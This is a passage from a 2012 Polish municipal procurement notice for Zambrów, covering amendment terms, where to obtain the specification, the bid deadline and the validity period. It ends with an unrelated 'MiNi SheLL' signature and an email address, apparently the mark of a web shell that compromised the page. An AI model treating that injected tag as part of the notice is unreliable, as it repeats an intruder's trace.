-Wprowadzenie  robót zamiennych wymaga uzgodnienia z autorem projektu i może być powiązane  ze zmianą wynagrodzenia umownego odpowiednio i proporcjonalnie.
-Wprowadzenie  robót ograniczających zakres prac objętych umową o których mowa w ppkt.2 powiązane jest ze zmianą wynagrodzenia umownego odpowiednio i proporcjonalnie.
3)  Zmian wynagrodzenia umownego     -   w   przypadku   ustawowej  zmiany  stawki  podatku od  towarów i usług    (VAT).
Określenie warunków zmian:
-Wynagrodzenie ulegnie zmianie stosownie do zmiany  stawki podatku bez zmiany wynagrodzenia  netto.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://um.zambrow.bip-gov.info.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Miasta Zambrów ul.Fabryczna 3 pok.216.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2012 godzina 11:00, miejsce: Oferty należy składać w siedzibie Zamawiającego - Urząd Miasta ul.Fabryczna 3  pokój nr  225.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com